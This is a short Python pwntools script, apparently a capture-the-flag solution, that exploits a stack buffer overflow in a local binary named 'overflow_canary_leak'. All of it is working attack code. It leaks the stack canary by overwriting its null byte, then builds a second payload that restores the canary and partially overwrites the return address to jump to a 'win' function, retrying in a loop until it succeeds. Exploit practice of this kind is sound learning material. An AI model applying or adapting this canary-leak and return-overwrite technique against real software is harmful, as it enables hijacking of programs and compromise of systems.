from pwn import *

filename = './overflow_canary_leak'

elf = ELF(filename)

def run_once():
	p = process(filename)
	### Between the start of the buffer and the canary
	data = b'a'*0x18
	data += b'c'*1 ## overflow 1 byte of canary for null byte

	p.readuntil(b'dataz: ')

	p.send(data)
	p.readuntil(b'said: ')
	p.readuntil(data)

	canary = u64(b'\x00' + p.read(7))

	print(hex(canary))

	p.readuntil(b'dataz: ')

	data = b'a'*0x18
	data += p64(canary)
	data += b'c'*8 ## saved rbp
	data += p16(elf.symbols['win'])

	p.send(data)

	try:
		print(p.readuntil(b'you win'))
		return 1
	except:
		return 0

while run_once() == 0:
	continue